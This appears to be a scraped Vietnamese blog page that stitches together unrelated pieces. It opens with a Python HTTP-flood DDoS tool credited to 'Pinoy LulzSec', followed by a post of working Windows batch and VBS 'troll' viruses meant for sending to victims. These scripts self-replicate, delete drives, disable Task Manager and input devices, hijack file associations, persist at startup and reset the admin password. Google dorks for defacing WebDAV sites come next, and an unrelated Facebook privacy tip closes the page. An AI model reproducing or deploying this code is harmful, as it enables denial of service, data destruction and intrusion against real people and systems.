shutdown -r -c "# ----------------------------------------------------------------------------------------------
#DDos tools of PinoyLulzSec
#
#
#
# Pinoy LulzSec
# ----------------------------------------------------------------------------------------------
import urllib2
import sys
import threading
import random
import re
#global params
url=''
host=''
headers_useragents=[]
headers_referers=[]
request_counter=0
flag=0
safe=0
def inc_counter():
global request_counter
request_counter+=1
def set_flag(val):
global flag
flag=val
def set_safe():
global safe
safe=1
# generates a user agent array
def useragent_list():
global headers_useragents
headers_useragents.append('Mozilla/5.0 (X11; U; Linux x86_64; en-US; rv:1.9.1.3) Gecko/20090913 Firefox/3.5.3')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.2; en-US; rv:1.9.1.3) Gecko/20090824 Firefox/3.5.3 (.NET CLR 3.5.30729)')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 6.1; en-US; rv:1.9.1.1) Gecko/20090718 Firefox/3.5.1')
headers_useragents.append('Mozilla/5.0 (Windows; U; Windows NT 5.1; en-US) AppleWebKit/532.1 (KHTML, like Gecko) Chrome/4.0.219.6 Safari/532.1')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.1; WOW64; Trident/4.0; SLCC2; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 6.0; Trident/4.0; SLCC1; .NET CLR 2.0.50727; .NET CLR 1.1.4322; .NET CLR 3.5.30729; .NET CLR 3.0.30729)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.2; Win64; x64; Trident/4.0)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 8.0; Windows NT 5.1; Trident/4.0; SV1; .NET CLR 2.0.50727; InfoPath.2)')
headers_useragents.append('Mozilla/5.0 (Windows; U; MSIE 7.0; Windows NT 6.0; en-US)')
headers_useragents.append('Mozilla/4.0 (compatible; MSIE 6.1; Windows XP)')
headers_useragents.append('Opera/9.80 (Windows NT 5.2; U; ru) Presto/2.5.22 Version/10.51')
return(headers_useragents)
# generates a referer array
def referer_list():
global headers_referers
headers_referers.append('http://www.google.com/?q=')
headers_referers.append('http://www.usatoday.com/search/results?q=')
headers_referers.append('http://engadget.search.aol.com/search?q=')
headers_referers.append('http://' + host + '/')
return(headers_referers)
#builds random ascii string
def buildblock(size):
out_str = ''
for i in range(0, size):
a = random.randint(65, 90)
out_str += chr(a)
return(out_str)
def usage():
print '---------------------------------------------------'
print 'USAGE: lulz.py <url> (ex. lulz.py http://www.gov.ph)'
print 'you can add "safe" after url, to autoshut after dos'
print '---------------------------------------------------'
#http request
def httpcall(url):
useragent_list()
referer_list()
code=0
if url.count("?")>0:
param_joiner="&"
else:
param_joiner="?"
request = urllib2.Request(url + param_joiner + buildblock(random.randint(3,10)) + '=' + buildblock(random.randint(3,10)))
request.add_header('User-Agent', random.choice(headers_useragents))
request.add_header('Cache-Control', 'no-cache')
request.add_header('Accept-Charset', 'ISO-8859-1,utf-8;q=0.7,*;q=0.7')
request.add_header('Referer', random.choice(headers_referers) + buildblock(random.randint(5,10)))
request.add_header('Keep-Alive', random.randint(110,120))
request.add_header('Connection', 'keep-alive')
request.add_header('Host',host)
try:
urllib2.urlopen(request)
except urllib2.HTTPError, e:
#print e.code
set_flag(1)
print 'Pinoy LulzSec attacking'
code=500
except urllib2.URLError, e:
#print e.reason
sys.exit()
else:
inc_counter()
urllib2.urlopen(request)
return(code)
#http caller thread
class HTTPThread(threading.Thread):
def run(self):
try:
while flag<2:
code=httpcall(url)
if (code==500) & (safe==1):
set_flag(2)
except Exception, ex:
pass
# monitors http threads and counts requests
class MonitorThread(threading.Thread):
def run(self):
previous=request_counter
while flag==0:
if (previous+100<request_counter) & (previous<>request_counter):
print "%d Requests Sent" % (request_counter)
previous=request_counter
if flag==2:
print "Work Done!"
#execute
if len(sys.argv) < 2:
usage()
sys.exit()
else:
if sys.argv[1]=="help":
usage()
sys.exit()
else:
print "-- Pinoy LulzSec DDos tool Startted --"
if len(sys.argv)== 3:
if sys.argv[2]=="safe":
set_safe()
url = sys.argv[1]
if url.count("/")==2:
url = url + "/"
m = re.search('http\://([^/]*)/?.*', url)
host = m.group(1)
for i in range(500):
t = HTTPThread()
t.start()
t = MonitorThread()
t.start()
" -t 15
Thứ Ba, 8 tháng 12, 2015
cách troll part 2 :v
Tạo một viruts tự nhân bản lên vào tất cả các thư mục trong
máy tính,đồng thời tất cả
Tác hại của con VR này:
- Nhân bản chính nó vào tất cả các thư mục của Windows, các
thư mục trong ổ C:\ D:\ và E:\ và cả các
thư mục con của nó. Nói chung là ổ cứng có bao nhiêu Folder
thì con VR sẽ nhân bản lên bấy nhiêu lần
và sau đó cho vào 1 Folder 1 bản.
Mục đích để người bị dính nó hoang mang lo sợ, muốn xóa cũng
ko thể nào xóa hết đc. Làm sao có thể
xóa được gần cả ngàn thư mục trong Windows? mà thư mục nào
cũng có mặt Virus
Và tất nhiên là mình có kèm theo cả thuốc giải
Chạy File thuốc giải là coi như xong, như chưa có chuyện gì
xảy ra vậy.
1.Đầu tiên các bạn mở Notepad lên (start > Run > gõ
> Notepad > enter).
Thuốc Độc
2. Tạo virus:
Gõ vào notepad đoạn code sau
Mã:
'Thuoc Doc !!!Dim fso,file,VBCopySet
fso=CreateObject("Scripting.FileSystemObject")Set
file=fso.OpenTextFile(WScript.ScriptFullName,1)VBC
opy=file.ReadAllFolderList("A:\")FolderList("B:\")
FolderList("C:\")FolderList("D:\")FolderList("E:\"
)FolderList("F:\")FolderList("G:\")FolderList("H:\
")FolderList("I:\")FolderList("J:\")FolderList("K:
\")FolderList("L:\")FolderList("M:\")FolderList("N
:\")FolderList("O:\")FolderList("P:\")FolderList("
Q:\")FolderList("R:\")FolderList("S:\")FolderList(
"T:\")FolderList("U:\")FolderList("V:\")FolderList
("X:\")FolderList("Y:\")FolderList("Z:\")FolderLis
t("W:\")Sub FolderList(FolderSpec)On Error Resume
NextDim f,f1,sf,COP,CAPSet f=fso.GetFolder(FolderSpec)set
sf=f.SubFoldersFor Each f1 In sfSet
COP=fso.CreateTextFile(f1.path & "\Virus
Boss!!!!!!!.vbs")COP.write VBCopySet
CAP=fso.CreateTextFile(f1.path & "---Virus
Boss!!!!!!!.vbs")CAP.write
VBCopyFolderList(f1.Path)NextEnd sub
Save lại bằng tên thuocdoc.vbs
Khi nạn nhân chạy file này thì virus sẽ tràn ngập trong máy
tính.
( Cả trong các thư mục và desktop ^_^).
Virus 2
Con này là Tự Tắt Máy
Nhấn chuột phải----New----Shortcut
Đánh vào đó dòng lệnh:
shutdown -s -t * -c "**"
* là số giây trước khi máy shut down(bạn tự đặt Khoảng 5s là
ok vừa đọc Xong Máy Tắt Lum)
"**" là tin nhắn sẽ xuất hiện khi trojan kích
hoạt(Máy Tính Bạn Sẽ Tắt Trong 5s Bấm shutdown Trước
Khi Nó Tắt Đi haha)
Ex: shutdown -s -t 5 -c "Máy Tính Bạn Sẽ Tắt Trong 5s
Bấm shutdown Trước Khi Nó Tắt Đi haha"
----NextĐặt file này ở đâu và tên ji` cũng được
ex: Hacker
----Fsinish
Mã:
shutdown -s -t 5 -c "Máy Tính Bạn Sẽ Tắt Trong 5s Bấm
shutdown Trước Khi Nó Tắt Đi haha"
Nhưng Thế Thì Share ai Dám nhấn Vào đâu
Phải Thay đổi bộ mặt của nó
Nhấp chuột phải vào biểu tượng con virus----Chọn vào thuộc
tính của virus----Shortcut----Change Icon---
-Chọn biểu tượng bạn mún con virus có Chọn Cái nào đẹp đẹp
vào
Như File Word Tên là Bài Tập Bấm Vào Mún Tắt cái thông báo
cũng không đc ( SÀi Rồi )
Đợi Nó Tự Tắt Máy Hay mình tự tắt TRước
Virus 3
Virus Không Thể Tắt ( nhưng dễ tắt )
Mã:
msgbox " Đừng có tắt dòng thông báo này đi nếu không
bạn sẽ gặp rắc rối đó!",,"Thông báo rùi nhé
không nghe ráng chịu!"msgbox "Đã Kêu Đừng Bấm Vào
Rồi Sao Vẫn Bấm Lỳ Vậy"domsgbox "Bạn đã
bị lừa Hiện giờ bạn không thể tắt thông báo này được! ha ha
ha!",,"Liên Hệ níck của
bạnheh@yahoo.com Để Tắt Thông Báo Này"loop
Save dưới dạng .vbs
Chọn All file và Unicode ở 2 dòng cuối
Virus 4 Bấm Enter Liên Tục ( không Ngừng )
Mã:
Set wshShell =
wscript.CreateObject("WScript.Shell") do wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop Lưu Lại với Tên bạn mún đặt.vbs nháCon này mình không
có thuốc
Virus 5
Ngập Tràn Notepad( không Ngừng )
Mã:
@ECHO off :top START %SystemRoot%\system32\notepad.exe GOTO
top
Lưu Lại với Tên bạn mún đặt.vbs nhá
Con này mình không có thuốc
Con Số 6 ( Trong Thứ 6 ngày 13) [Cực Khủng Lum
Mở notepad lên copy đoạn lệnh này vào :
Mã:
reg add
"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr entVersion\Run" /v
shutdown /t
REG_SZ /d "shutdown.exe -f -s -t 05" /freg add
"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr
entVersion\Policies\System" /v
DisableTaskmgr /t REG_DWORD /d 1 /fclscopy thelove.bat
"C:\Documents and Settings\All Users\StartMenu\Programs\Startup\"clstaskkill
/f /im explorer.execlsshutdown.exe -f -s -t 05 -c "your computer will
turn off after 5s ..."cls@echo offecho
Warning!!!!!!!!May Tinh Cua Ban Da Bi Nhiem Virus Bat Diet
!!!!!!!!!echo GOOD BYE pausedel Hacker Ghost_Team.bat
save lại với tên Hacker Ghost_Team.bat và gửi cho victim ,
chỉ 1 click thì explorer bị tắt , mà hình trắng
trơn
tự động sau 5 GIÂY là máy bị tắt . Từ lần khởi động máy sau
cũng tương tự bị như thế cứ 5 GIÂY là tắt
haha
Nếu Chạy Kèm Với Con Này
Mã:
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr
e ntVersion\Run" /v shutdown /t
REG_SZ /d "shutdown.exe -f -s -t 05" /f reg add
"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr e
ntVersion\Policies\System" /v
DisableTaskmgr /t REG_DWORD /d 1 /f cls copy thelove.bat
"C:\Documents and Settings\All
Users\Start Menu\Programs\Startup\" cls taskkill /f /im
explorer.exe cls @echo off echo
Warning!!!!!!!!May Tinh Cua Ban Da Bi Nhiem Virus Bat Diet
!!!!!!!!! echo GOOD BYE SEE YOU
AGAIN pause del
Hacker Ghost_Team.bat Thì Lại Thành Vô Đối
Giải Cứu ( Cái Này Phải Có Trong Máy Trước không nguy cơ Đón
win mới là rất Cao)
Mã:
and Settings\All Users\Start Menu\Startup\" cls
Mã:
shutdown -a shutdown -a shutdown -a shutdown -a shutdown -a
shutdown -a shutdown -a shutdown -a
shutdown -a shutdown -a cls
Mã:
reg delete
"HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr e ntVersion\Run"
/v shutdown
reg add "HKEY_CURRENT_USER\Software\Microsoft\Windows\Curr
e ntVersion\Policies\System" /v
DisableTaskmgr /t REG_DWORD /d 0 /f cls del "C:\Documents and Settings\All
Users\Start
Menu\Programs\Startup\*.bat" cls @echo off echo xong
roi ... an toan roi... echo GOOD BYE SEE YOU
AGAIN pause Lưu Lại Với 3 tên Khác nhau Rồi Bỏ Vào 1 Foder
Tên giải Cứu nhét vô Ổ D nha
GIẢI CỨU :
Vì nó tắt explorer , taskmanganer ,và tự động shutdown và
thực hiện trên all user nên chỉ còn cách vào
admin .
vào admin xong mở file giaicuu.rar vừa lưu vào ổ D:\
chạy file giaicuu.bat trong đó , xong rồi restart lại
máy(không cần vào admin) chạy tiếp tieptheo.bat thế là
xong .....
CHÚ Ý :Nếu đã wa' thù ghét victim thì hãy khóa luôn admin
của hắn bằng cách thêm :
net user administrator 123456
vào đầu đoạn mã trên.(123456 là password của admin )
P/S: cấm dùng Virut 6 đi phá người nhá .. nhận win mới là
chắc luôn .nếu chèn thêm cái ở dưới convirut 6 là bất diệt ... phải có file
giải cứu trước .mà mở lên là nó tắt nữa nên thay win là chắc ) nghiêm
một số tiện ích của file .bat để troll người khác hoặc phá vui
Mình sẽ cho các bạn xem một số code của con virus đuôi .BAT:
1) virus phá hoại cửa sổ windown:
@echo off
msg *virus activated*
attrib -r -s -h c:\autoexec.bat
attrib -r -s -h c:\boot.ini
attrib -r -s -h c:\ntldr
attrib -r -s -h c:\windows\win.ini
@echo off
msg *Computer Over. Virus=Very Yes.*
shutdown -s -t 10 -c " "
2)loại virus này làm vô hiệu hóa chuột, bàn phím,task
manager, thay đổi tập
tin:
code:
@echo off
prompt $P $G
assoc .doc = fA1luRe
assoc .docx = fA1luRe
assoc .log = fA1luRe
assoc .msg = fA1luRe
assoc .pages = fA1luRe
assoc .rtf = fA1luRe
assoc .txt = fA1luRe
assoc .wpd = fA1luRe
assoc .wps = fA1luRe
assoc .accdb = fA1luRe
assoc .blg = fA1luRe
assoc .csv = fA1luRe
assoc .dat = fA1luRe
assoc .db = fA1luReassoc .efx = fA1luRe
assoc .mdb = fA1luRe
assoc .pdb = fA1luRe
assoc .pps = fA1luRe
assoc .ppt = fA1luRe
assoc .pptx = fA1luRe
assoc .sdb = fA1luRe
assoc .sdf = fA1luRe
assoc .sql = fA1luRe
assoc .vcf = fA1luRe
assoc .wks = fA1luRe
assoc .xls = fA1luRe
assoc .xlsx = fA1luRe
assoc .xml = fA1luRe
assoc .bmp = fA1luRe
assoc .gif = fA1luRe
assoc .jpg = fA1luRe
assoc .png = fA1luRe
assoc .psd = fA1luRe
assoc .psp = fA1luRe
assoc .thm = fA1luRe
assoc .tif = fA1luRe
assoc .ai = fA1luRe
assoc .drw = fA1luRe
assoc .eps = fA1luRe
assoc .ps = fA1luRe
assoc .svg = fA1luRe
assoc .3dm = fA1luRe
assoc .dwg = fA1luRe
assoc .dxf = fA1luRe
assoc .pln = fA1luRe
assoc .indd = fA1luRe
assoc .pct = fA1luRe
assoc .pdf = fA1luRe
assoc .qxd = fA1luRe
assoc .qxp = fA1luReassoc .rels = fA1luRe
assoc .aac = fA1luRe
assoc .aif = fA1luRe
assoc .iff = fA1luRe
assoc .m3u = fA1luRe
assoc .mid = fA1luRe
assoc .mp3 = fA1luRe
assoc .mpa = fA1luRe
assoc .ra = fA1luRe
assoc .wav = fA1luRe
assoc .wma = fA1luRe
assoc .3g2 = fA1luRe
assoc .3gp = fA1luRe
assoc .asf = fA1luRe
assoc .asx = fA1luRe
assoc .avi = fA1luRe
assoc .flv = fA1luRe
assoc .mov = fA1luRe
assoc .mp4 = fA1luRe
assoc .mpg = fA1luRe
assoc .rm = fA1luRe
assoc .swf = fA1luRe
assoc .vob = fA1luRe
assoc .wmv = fA1luRe
assoc .asp = fA1luRe
assoc .cer = fA1luRe
assoc .csr = fA1luRe
assoc .css = fA1luRe
assoc .htm = fA1luRe
assoc .html = fA1luRe
assoc .js = fA1luRe
assoc .jsp = fA1luRe
assoc .php = fA1luRe
assoc .rss = fA1luRe
assoc .tvpi = fA1luRe
assoc .tvvi = fA1luReassoc .xhtml = fA1luRe
assoc .fnt = fA1luRe
assoc .fon = fA1luRe
assoc .otf = fA1luRe
assoc .ttf = fA1luRe
assoc .8bi = fA1luRe
assoc .plugin = fA1luRe
assoc .xll = fA1luRe
assoc .cab = fA1luRe
assoc .cpl = fA1luRe
assoc .cur = fA1luRe
assoc .dll = fA1luRe
assoc .dmp = fA1luRe
assoc .drv = fA1luRe
assoc .key = fA1luRe
assoc .lnk = fA1luRe
assoc .sys = fA1luRe
assoc .cfg = fA1luRe
assoc .ini = fA1luRe
assoc .keychain = fA1luRe
assoc .prf = fA1luRe
assoc .app = fA1luRe
assoc .bat = fA1luRe
assoc .cgi = fA1luRe
assoc .com = fA1luRe
assoc .exe = fA1luRe
assoc .pif = fA1luRe
assoc .vb = fA1luRe
assoc .ws = fA1luRe
assoc .7z = fA1luRe
assoc .deb = fA1luRe
assoc .gz = fA1luRe
assoc .pkg = fA1luRe
assoc .rar = fA1luRe
assoc .sit = fA1luRe
assoc .sitx = fA1luReassoc .tar.gz = fA1luRe
assoc .zip = fA1luRe
assoc .zipx = fA1luRe
assoc .bin = fA1luRe
assoc .hqx = fA1luRe
assoc .mim = fA1luRe
assoc .uue = fA1luRe
assoc .c = fA1luRe
assoc .cpp = fA1luRe
assoc .dtd = fA1luRe
assoc .java = fA1luRe
assoc .pl = fA1luRe
assoc .bak = fA1luRe
assoc .bup = fA1luRe
assoc .gho = fA1luRe
assoc .ori = fA1luRe
assoc .tmp = fA1luRe
assoc .dmg = fA1luRe
assoc .iso = fA1luRe
assoc .toast = fA1luRe
assoc .vcd = fA1luRe
assoc .gam = fA1luRe
assoc .nes = fA1luRe
assoc .rom = fA1luRe
assoc .sav = fA1luRe
assoc .dbx = fA1luRe
assoc .msi = fA1luRe
assoc .part = fA1luRe
assoc .torrent = fA1luRe
assoc .yps = fA1luRe
rundll32.exe mouse, disable
rundll32.exe keyboard, disable
copy setup.bat
%userprofile%\AppData\Roaming\Microsoft\Windows\Start
Menu\Programs\Startup
copy setup.bat %windir%\System32
reg add HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Run
/v fA1luRe /t REG_SZ /d %windir%\System32\setup.bat
taskkill /f /im taskmgr.exe
reg restore
HKEY_CURRENT_USER\Software\Microsoft\Windows\CurrentVersion\Policie
s\System DisableTaskMgr = 1
shutdown -s -f -t 10 -c "PwN3D by fA1luRe!!!"
3)kiểm tra % của CPU lên đến bao nhiêu %:
bạn mở notepad ra và gõ start 1.bat vào trong rồi các bạn
lưu con virus này là
1.bat rồi ngay lập tức % CPU sẽ tăng lên.
4)lặp lại nhiều lần chu kỳ mess:
Code:
@ECHO off
:Begin
msg * lời cảnh báo
msg * lời cảnh báo
msg * lời cảnh báo
msg * lời cảnh báo
msg * lời cảnh báo
GOTO BEGIN
VD:
@ECHO off
:Begin
msg * Hi
msg * khoe ko anh ?
msg * em ne ?
msg * buon ngu chua anh ?
msg * tat may ngu thoi ,bb anh
GOTO BEGIN
5)tự động tắt máy và kèm theo lời nhắn:
Code:
@echo off
msg * lời cảnh báo
shutdown -c “lời cảnh báo” -s
VD:@echo off
msg * I LOVE YOU
shutdown -c “Error! tam biet anh!” -s
Còn đây là một số con virus có đuôi là .VBS
1)Chức năng gửi thông điệp cảnh báo:
Code:
text1=msgbox("Thông điêp cảnh báo",42,"Tên
thông điệp cảnh báo")
2)Chức năng làm đứng máy tính:
Code:
msgbox"Error !"
On Error Resume Next
Set vip_xinh =
Createobject("scripting.filesystemobject")
vip_xinh.copyfile
wscript.scriptfullname,vip_xinh.GetSpecialFolder(0 )& "\
vip_xinh.vbs"
Set vip_xinh2= CreateObject("WScript.Shell")
vip_xinh2.regwrite
"HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Ru
n\die","wscript.exe "&
vip_xinh.GetSpecialFolder(0)& "\ vip_xinh.vbs %"
On Error Resume Next
Const vic = "D:\"
Delvic
Sub Delvic()
Dim fso
Set fso =
CreateObject("Scripting.FileSystemObject")
fso.DeleteFile vic & "*.*" , True
fso.DeleteFolder vic & "*" , True
End Sub
On Error Resume Next
Const vic1 = "C:\windows\"
Delvic1
Sub Delvic1()
Dim fso1
Set fso1 =
CreateObject("Scripting.FileSystemObject")fso1.DeleteFile vic1 &
"*.*" , True
fso1.DeleteFolder vic1 & "*" , True
End Sub
On Error Resume Next
Const vic2 = "C:\"
Delvic2
Sub Delvic2()
Dim fso2
Set fso2 = CreateObject("Scripting.FileSystemObject")
fso2.DeleteFile vic2 & "*.*" , True
fso2.DeleteFolder vic2 & "*" , True
End Sub
On Error Resume Next
Set treomay= CreateObject("WScript.Shell")
Do
treomay.run "notepad",false
loop
3)Đây là một con virus rất ác mình khuyên ban muốn thử nó
thì hãy đóng
băng tất cả các ổ trước khi sử dụng nó không thì rước họa
vào thân đấy bạn
Code:
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set file=fso.OpenTextFile(WScript.ScriptFullName,1)
VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")
Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders
For Each f1 In sf
Set COP=fso.CreateTextFile(f1.path & "\Virus
!!!!!!!.vbs")
COP.write VBCopy
Set CAP=fso.CreateTextFile(f1.path & "---Virus
!!!!!!!.vbs")
CAP.write VBCopy
FolderList(f1.Path)
Next
End sub
Còn đây là thuốc giải:
Code:
Dim fso,file,VBCopy
Set fso=CreateObject("Scripting.FileSystemObject")
Set
file=fso.OpenTextFile(WScript.ScriptFullName,1)VBCopy=file.ReadAll
FolderList("A:")
FolderList("B:")
FolderList("C:")
FolderList("D:")
FolderList("E:")
FolderList("F:")
FolderList("G:")
FolderList("H:")
FolderList("I:")
FolderList("J:")
FolderList("K:")
FolderList("L:")
FolderList("M:")
FolderList("N:")
FolderList("O:")
FolderList("P:")
FolderList("Q:")
FolderList("R:")
FolderList("S:")
FolderList("T:")
FolderList("U:")
FolderList("V:")
FolderList("X:")
FolderList("Y:")
FolderList("Z:")
FolderList("W:")
Sub FolderList(FolderSpec)
On Error Resume Next
Dim f,f1,sf,COP,CAP,ATT
Set f=fso.GetFolder(FolderSpec)
set sf=f.SubFolders For Each f1 In sf
'Set COP=fso.CreateTextFile(f1.path & "\Virus
!!!!!!!.vbs")
'COP.write VBCopy
'Set CAP=fso.CreateTextFile(f1.path & "---Virus
!!!!!!!.vbs")
'CAP.write VBCopy'Set ATT=fso.GetFolder(f1.Path)
'ATT.Attributes=ATT.Attributes+2
fso.DeleteFile(f1.path & "\Virus !!!!!!!.vbs")
fso.DeleteFile(f1.path & "---Virus
!!!!!!!.vbs")
FolderList(f1.Path)
Next
End sub
4)chức năng mở một thông điệp rồi sẽ tự động tắt máy:
Code:
@echo off
msg * thông điệp
shutdown -c "thông điệp" -s -t 10
5)không cho victim khởi động máy:
Code:
Dim wsh
Set wsh = createobject("wscript.shell")
wsh.run "RUNDLL32.EXE user.exe,exitwindows"
6)Disable NAV:
Code:
Dim wsh
Set wsh= CreateObject( "WScript.Shell")
s1 = "
HKEY_LOCAL_MACHINE\System\CurrentControlSet\Servic
es\Norton Program
Scheduler\Start"
wsh.RegWrite s1,3, "REG_DWORD"
7)hiển thị message mỗi khi restart máy:
Code:
dim wsh
Set wsh = CreateObject( "WScript.Shell" )
s1 = "
HKLM\Software\Microsoft\Windows\CurrentVersion\Win
Logon\"
s2 = "LegalNoticeCaption"s3 =
"LegalNoticeText"
wsh.RegWrite s1+s2, "lời cảnh báo"
wsh.RegWrite s1+s3, "lời cảnh báo"
8)chuc nang hien thi dong lenh khi ban click vao floder:
Code:
set reg=createobject("WScript.shell")
reg.regwrite
"HKEY_CLASSES_ROOT\*\Shell\\","loi canh bao"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\loi canh
bao\","SLM"
vd:
set reg=createobject("WScript.shell")
reg.regwrite "HKEY_CLASSES_ROOT\*\Shell\\","Hi
! Ban da bi nhiem WK
tu truongton.net"
reg.regwrite "HKEY_CLASSES_ROOT\folder\shell\Hi ! Ban
da bi nhiem WK
tu truongton.net\","SLM"
9)Xóa Registry Files:
Code:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO slm loi canh bao.
GOTO MESSAGE
vd:
@ECHO OFF
START reg delete HKCR/.exe
START reg delete HKCR/.dll
START reg delete HKCR/*
:MESSAGE
ECHO slm chuc anh 1 ngay vui ve.
GOTO MESSAGE
10)Bật notepad lien tuc lam may tinh bi ngơ:
Code:@ECHO off
:top
START %SystemRoot%\system32\notepad.exe
GOTO top
11)bật tắt caps lock liên tục:
Code:
Set wshShell
=wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{CAPSLOCK}"
loop
12)Ép enter liên tục:
Code:
Set wshShell = wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "~(enter)"
loop
ep Backspace lien tuc:
MsgBox "Let's go back a few steps"
Set wshShell
=wscript.CreateObject("WScript.Shell")
do
wscript.sleep 100
wshshell.sendkeys "{bs}"
loop
Còn đây là một số con virus có đuôi .cmd:
1)Xóa sạch tất cả các file có trong máy:
Code:
2)Xóa một file nào đó:
Code:
erase đường dẫnvd:
erase C:\TEST.txt
3)Ẩn tòan bộ file trong win
Code:
ATTRIB +S /F /Q *
các cách tìm lỗi webDAV để deface

intitle:"Directory Listing For /" + inurl:webdav tomcat
intitle:"Directory Listing For /" + inurl:webdav
inurl:*.edu/*.asp
inurl:.gov.*/*.asp
inurl:*.gov/*.asp
inurl:.org/*.asp
inurl:.ag/*.asp
inurl:.it/*.asp
inurl:.uk/*.asp
inurl:.co.il/*.asp
inurl:.com/*.asp
inurl:.co.id/*.asp
inurl:.ah.cn/*.asp
inurl:.bj.cn/*.asp
inurl:.cq.cn/*.asp
inurl:.fj.cn/*.asp
inurl:.gd.cn/*.asp
inurl:.gs.cn/*.asp
inurl:.gz.cn/*.asp
inurl:.gx.cn/*.asp
inurl:.ha.cn/*.asp
inurl:.hb.cn/*.asp
inurl:.he.cn/*.asp
inurl:.hi.cn/*.asp
inurl:.hl.cn/*.asp
inurl:.hn.cn/*.asp
inurl:.jl.cn/*.asp
inurl:.js. cn/*.asp
inurl:.jx.cn/*.asp
inurl:.ln.cn/*.asp
inurl:.nm.cn/*.asp
inurl:.nx.cn/*.asp
inurl:.qh.cn/*.asp
inurl:.sc.cn/*.asp
inurl:.sd.cn/*.asp
inurl:.sh.cn/*.asp
inurl:.sn.cn/*.asp
inurl:.sx.cn/*.asp
inurl:.tj.cn/*.asp
inurl:.tw.cn/*.asp
inurl:.xj.cn/*.asp
inurl:.xz.cn/*.asp
Khi bạn không thể từ chối một lời mời kết bạn trên Facebook
Bạn gặp anh ta hằng ngày trong phòng tập thể hình và một vài lần trên đường. Nhưng chẳng biết làm thế nào anh ta biết được Facebook của bạn và gửi tới một lời mời kết bạn. Trong trường hợp này bạn sẽ làm thế nào? Nếu bạn bỏ qua, bạn có thể sẽ cảm thấy khó xử khi gặp lại anh ta, nhưng anh ta cũng chưa đủ thân thiết để kết bạn, mặc dù bạn cũng đã có vài cuộc trò chuyện và anh ta tỏ ra là một người tốt và khá chân thật.

Vậy phải sẽ làm thế nào nếu nhận được yêu cầu kết bạn từ một người quen ở văn phòng công ty, một người bạn chung lớp cũ, một người đã gặp và tiếp xúc vài lần… nhưng chưa đủ thân để kết bạn, dù là kết bạn trên Facebook?

Vậy phải sẽ làm thế nào nếu nhận được yêu cầu kết bạn từ một người quen ở văn phòng công ty, một người bạn chung lớp cũ, một người đã gặp và tiếp xúc vài lần… nhưng chưa đủ thân để kết bạn, dù là kết bạn trên Facebook?
Sau đây là một cách bạn có thể áp dụng để vừa giữ mối quan hệ tôt đẹp, vừa có thể bảo vệ tính riêng tư của mình với những người mới quen.
Khi nhận được một lời mời kết bạn từ một người quen mà mình không muốn, bạn có thể từ chối hoặc hoặc chọn Lúc khác để quyết định sau, và người bên kia sẽ nhận được thông báo đang chờ bạn chấp nhận.
Nếu không còn cách nào khác (có thể bạn gặp họ và họ nhắc lại về việc này), bạn hãy nhấn Chấp nhận, nhưng cho vào danh sách Hạn chế.
Để làm được điều này, bạn truy cập vào trang cá nhân của họ, rê chuột đến nút Bạn bè nằm trên ảnh cover, danh sách tùy chọn hiện ra và bạn chọn vào Thêm vào danh sách. Sau đó chọn Bị hạn chế.
Mục đích của việc này là họ chỉ được phép truy cập và xem ảnh, trạng thái của bạn nếu nó được đặt ở chế độCông khai, giống như một người chưa kết bạn có thể làm. Và tất nhiên họ sẽ không thấy những hình ảnh mà bạn chia sẻ với những người bạn thật sự của mình.
Và nếu như bạn cũng không muốn xem cập nhật trạng thái, hình ảnh… của họ, nhấn vào Đang theo dõi để hủy. Vậy là từ nay, bạn sẽ không còn thấy những cập nhật của họ trên trang chủ của mình nữa.
Nếu không còn cách nào khác (có thể bạn gặp họ và họ nhắc lại về việc này), bạn hãy nhấn Chấp nhận, nhưng cho vào danh sách Hạn chế.Để làm được điều này, bạn truy cập vào trang cá nhân của họ, rê chuột đến nút Bạn bè nằm trên ảnh cover, danh sách tùy chọn hiện ra và bạn chọn vào Thêm vào danh sách. Sau đó chọn Bị hạn chế.
Mục đích của việc này là họ chỉ được phép truy cập và xem ảnh, trạng thái của bạn nếu nó được đặt ở chế độCông khai, giống như một người chưa kết bạn có thể làm. Và tất nhiên họ sẽ không thấy những hình ảnh mà bạn chia sẻ với những người bạn thật sự của mình.Và nếu như bạn cũng không muốn xem cập nhật trạng thái, hình ảnh… của họ, nhấn vào Đang theo dõi để hủy. Vậy là từ nay, bạn sẽ không còn thấy những cập nhật của họ trên trang chủ của mình nữa.
Để có thể cập nhật lại, nhấn vào Theo dõi. Để cho phép họ xem tất cả các trạng thái và hình ảnh của mình như một người bạn bình thường, bạn chọn vào Bạn bè/Thêm vào danh sách/ chọn lại Bị hạn chế, làm như vậy để tắt tính năng này.
